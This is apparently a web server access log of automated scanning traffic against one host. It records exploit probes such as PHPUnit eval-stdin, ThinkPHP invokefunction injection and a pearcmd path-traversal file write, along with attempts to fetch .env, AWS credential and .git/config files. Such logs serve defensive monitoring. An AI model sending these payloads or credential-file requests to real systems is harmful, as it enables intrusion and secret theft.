"/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.55.16.35] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:18:00:16 +0000] 404 - GET http 91.82.83.208 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.55.16.35] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:18:00:17 +0000] 404 - GET http 91.82.83.208 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.55.16.35] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:18:00:19 +0000] 404 - GET http 91.82.83.208 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.55.16.35] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:18:00:20 +0000] 404 - GET http 91.82.83.208 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.55.16.35] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:18:00:21 +0000] 404 - GET http 91.82.83.208 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.55.16.35] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:18:00:22 +0000] 404 - GET http 91.82.83.208 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.55.16.35] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:18:00:23 +0000] 404 - GET http 91.82.83.208 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.55.16.35] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:18:00:24 +0000] 404 - GET http 91.82.83.208 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.55.16.35] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:18:00:25 +0000] 404 - GET http 91.82.83.208 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.55.16.35] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:18:00:26 +0000] 404 - GET http 91.82.83.208 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.55.16.35] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:18:00:27 +0000] 404 - GET http 91.82.83.208 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.55.16.35] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:18:00:29 +0000] 404 - GET http 91.82.83.208 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.55.16.35] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:18:00:30 +0000] 404 - GET http 91.82.83.208 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.55.16.35] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:18:00:31 +0000] 404 - GET http 91.82.83.208 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.55.16.35] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:18:00:32 +0000] 404 - GET http 91.82.83.208 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.55.16.35] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:18:00:33 +0000] 404 - GET http 91.82.83.208 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.55.16.35] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:18:00:34 +0000] 404 - GET http 91.82.83.208 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.55.16.35] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:18:00:35 +0000] 404 - GET http 91.82.83.208 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.55.16.35] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:18:00:36 +0000] 404 - GET http 91.82.83.208 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 38.55.16.35] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:18:00:37 +0000] 404 - GET http 91.82.83.208 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 38.55.16.35] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:18:00:38 +0000] 403 - GET http 91.82.83.208 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 38.55.16.35] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:18:00:39 +0000] 403 - GET http 91.82.83.208 "/index.php?lang=../../../../../../../../tmp/index1" [Client 38.55.16.35] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:18:00:41 +0000] 404 - GET http 91.82.83.208 "/containers/json" [Client 38.55.16.35] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:18:02:38 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.187.35.158] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:18:04:45 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:18:14:16 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:18:32:44 +0000] 400 - GET http 91.82.83.208 "/" [Client 146.190.93.166] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[20/Jan/2026:18:32:45 +0000] 400 - GET http 91.82.83.208 "/t4" [Client 146.190.93.166] [Length 252] [Gzip -] "Mozilla/5.0" "-" +[20/Jan/2026:18:32:46 +0000] 400 - GET http 91.82.83.208 "/favicon.ico" [Client 146.190.93.166] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[20/Jan/2026:18:37:34 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:18:38:31 +0000] 404 - GET http 91.82.83.208 "/.env" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr) AppleWebKit/418.9.1 (KHTML, like Gecko) Safari/419.3" "-" +[20/Jan/2026:18:38:31 +0000] 404 - GET http 91.82.83.208 "/api/.env" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.0.3; en-us; cm_tenderloin Build/GWK74) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30" "-" +[20/Jan/2026:18:38:31 +0000] 404 - GET http 91.82.83.208 "/backend/.env" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Android 7.1.1; Tablet; rv:57.0) Gecko/57.0 Firefox/57.0" "-" +[20/Jan/2026:18:38:32 +0000] 404 - GET http 91.82.83.208 "/admin/.env" [Client 78.153.140.151] [Length 150] [Gzip -] "Opera/9.01 (Macintosh; PPC Mac OS X; U; it)" "-" +[20/Jan/2026:18:38:32 +0000] 404 - GET http 91.82.83.208 "/.env.example" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36" "-" +[20/Jan/2026:18:38:32 +0000] 404 - GET http 91.82.83.208 "/app_dev.php/_profiler/phpinfo" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1" "-" +[20/Jan/2026:18:38:32 +0000] 200 - GET http 91.82.83.208 "/?phpinfo=-1" [Client 78.153.140.151] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0" "-" +[20/Jan/2026:18:38:32 +0000] 404 - GET http 91.82.83.208 "/docs/.env" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.0; rv:44.0) Gecko/20100101 Firefox/44.0" "-" +[20/Jan/2026:18:38:32 +0000] 404 - GET http 91.82.83.208 "/old/.env" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.2 (KHTML, like Gecko) Chrome/6.0.454.0 Safari/534.2" "-" +[20/Jan/2026:18:38:33 +0000] 404 - GET http 91.82.83.208 "/.env.local" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 GTB5" "-" +[20/Jan/2026:18:38:33 +0000] 404 - GET http 91.82.83.208 "/cms/.env" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15" "-" +[20/Jan/2026:18:38:33 +0000] 400 - GET http 91.82.83.208 "/config.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[20/Jan/2026:18:38:34 +0000] 404 - GET http 91.82.83.208 "/new/.env" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0" "-" +[20/Jan/2026:18:38:34 +0000] 404 - GET http 91.82.83.208 "/frontend/web/debug/default/view" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10" "-" +[20/Jan/2026:18:38:34 +0000] 404 - GET http 91.82.83.208 "/_static/.env" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" +[20/Jan/2026:18:38:34 +0000] 404 - GET http 91.82.83.208 "/download/.env" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.17 (KHTML, like Gecko) Chrome/11.0.655.0 Safari/534.17" "-" +[20/Jan/2026:18:38:34 +0000] 404 - GET http 91.82.83.208 "/saas/.env" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.0; ja; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "-" +[20/Jan/2026:18:38:34 +0000] 404 - GET http 91.82.83.208 "/.env.json" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063" "-" +[20/Jan/2026:18:38:35 +0000] 404 - GET http 91.82.83.208 "/infos/" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/10.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30" "-" +[20/Jan/2026:18:38:35 +0000] 404 - GET http 91.82.83.208 "/apps/.env" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36" "-" +[20/Jan/2026:18:38:35 +0000] 404 - GET http 91.82.83.208 "/templates/.env" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Android 6.0; Mobile; rv:53.0) Gecko/53.0 Firefox/53.0" "-" +[20/Jan/2026:18:38:35 +0000] 404 - GET http 91.82.83.208 "/system/.env" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3" "-" +[20/Jan/2026:18:38:35 +0000] 404 - GET http 91.82.83.208 "/stag/.env" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16" "-" +[20/Jan/2026:18:38:35 +0000] 404 - GET http 91.82.83.208 "/public_html/.env" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 7.0; SAMSUNG SM-G930F Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/6.2 Chrome/56.0.2924.87 Mobile Safari/537.36" "-" +[20/Jan/2026:18:38:35 +0000] 404 - GET http 91.82.83.208 "/.env.development" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3" "-" +[20/Jan/2026:18:38:36 +0000] 404 - GET http 91.82.83.208 "/portal/.env" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 7.1.1; N9560 Build/NMF26F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36" "-" +[20/Jan/2026:18:38:36 +0000] 404 - GET http 91.82.83.208 "/project/.env" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; WebMoney Advisor; Tablet PC 2.0; InfoPath.2)" "-" +[20/Jan/2026:18:38:36 +0000] 404 - GET http 91.82.83.208 "/.aws/credentials" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.36" "-" +[20/Jan/2026:18:38:36 +0000] 404 - GET http 91.82.83.208 "/app/config/parameters.yml" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.6) Gecko/2009012700 SUSE/3.0.6-1.4 Firefox/3.0.6" "-" +[20/Jan/2026:18:38:36 +0000] 404 - GET http 91.82.83.208 "/exapi/.env" [Client 78.153.140.151] [Length 150] [Gzip -] "More Firefox 3.6 user agents strings -->>" "-" +[20/Jan/2026:18:46:08 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.187.35.158] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:18:49:19 +0000] 200 - GET http 192.168.100.43 "/" [Client 192.168.100.179] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[20/Jan/2026:18:49:20 +0000] 400 - GET http 192.168.100.43 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[20/Jan/2026:18:50:28 +0000] 400 - - http localhost "-" [Client 20.163.37.98] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:18:53:15 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:18:57:18 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.18] [Length 1033] [Gzip -] "-" "-" +[20/Jan/2026:18:59:12 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:18:59:34 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:19:05:15 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:19:07:02 +0000] 404 - GET http 91.82.83.208 "/geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0" [Client 204.76.203.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:07:12 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.46] [Length 1033] [Gzip -] "-" "-" +[20/Jan/2026:19:07:57 +0000] 404 - GET http 91.82.83.208 "/bins/" [Client 204.76.203.18] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:19:09:05 +0000] 404 - POST http 91.82.83.208 "/goform/formJsonAjaxReq" [Client 91.224.92.14] [Length 150] [Gzip -] "Go-http-client/1.1" "http://91.82.83.208/home.asp" +[20/Jan/2026:19:11:29 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:19:15:30 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 159.89.174.87] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:19:15:31 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 159.89.174.87] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:19:15:32 +0000] 400 - - http localhost "-" [Client 68.183.180.73] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:19:16:44 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 146.70.65.3] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:19:17:13 +0000] 200 - GET http profibot.direct.quickconnect.to "/" [Client 167.94.138.119] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[20/Jan/2026:19:17:13 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.138.119] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:19:17:15 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.138.119] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:19:17:18 +0000] 400 - GET http profibot.direct.quickconnect.to "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[20/Jan/2026:19:24:22 +0000] 400 - GET https localhost "/" [Client 94.102.49.155] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:19:28:50 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:19:32:09 +0000] 400 - GET https localhost "/" [Client 95.215.0.144] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:19:35:20 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:19:39:06 +0000] 404 - GET http 91.82.83.208 "/geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0" [Client 204.76.203.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:40:44 +0000] 404 - GET http 91.82.83.208 "/actuator/health" [Client 20.106.56.125] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[20/Jan/2026:19:46:10 +0000] 200 - GET http 91.82.83.208 "/" [Client 170.106.72.178] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[20/Jan/2026:19:47:07 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:19:47:51 +0000] 404 - POST http 91.82.83.208 "/goform/formJsonAjaxReq" [Client 91.224.92.14] [Length 150] [Gzip -] "Go-http-client/1.1" "http://91.82.83.208/home.asp" +[20/Jan/2026:19:51:39 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:19:56:38 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:20:16:51 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:20:31:43 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:20:34:17 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:20:41:19 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:20:43:57 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:20:44:02 +0000] 200 - GET http 91.82.83.208 "/" [Client 209.38.81.190] [Length 568] [Gzip 1.86] "Mozilla/5.0" "-" +[20/Jan/2026:20:44:03 +0000] 405 - POST http 91.82.83.208 "/" [Client 209.38.81.190] [Length 154] [Gzip -] "Mozilla/5.0" "-" +[20/Jan/2026:20:47:57 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 149.88.26.10] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:20:50:18 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:20:50:53 +0000] 404 - GET http 91.82.83.208 "/geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0" [Client 204.76.203.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:20:55:59 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:21:05:46 +0000] 404 - GET http 91.82.83.208 "/.env" [Client 195.177.94.73] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36" "-" +[20/Jan/2026:21:06:58 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:21:17:18 +0000] 404 - GET http 91.82.83.208 "/geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0" [Client 204.76.203.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:21:18:14 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:21:18:55 +0000] 404 - GET http 91.82.83.208 "/.git/config" [Client 195.177.94.73] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-N950F Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/9.4 Chrome/67.0.3396.87 Mobile Safari/537.36" "-" +[20/Jan/2026:21:20:38 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:21:33:15 +0000] 404 - GET http 91.82.83.208 "/bin/" [Client 204.76.203.18] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:21:35:23 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:21:39:48 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:21:43:23 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:21:45:53 +0000] 404 - GET http 91.82.83.208 "/geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0" [Client 204.76.203.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:21:49:00 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:21:54:44 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 103.232.121.71] 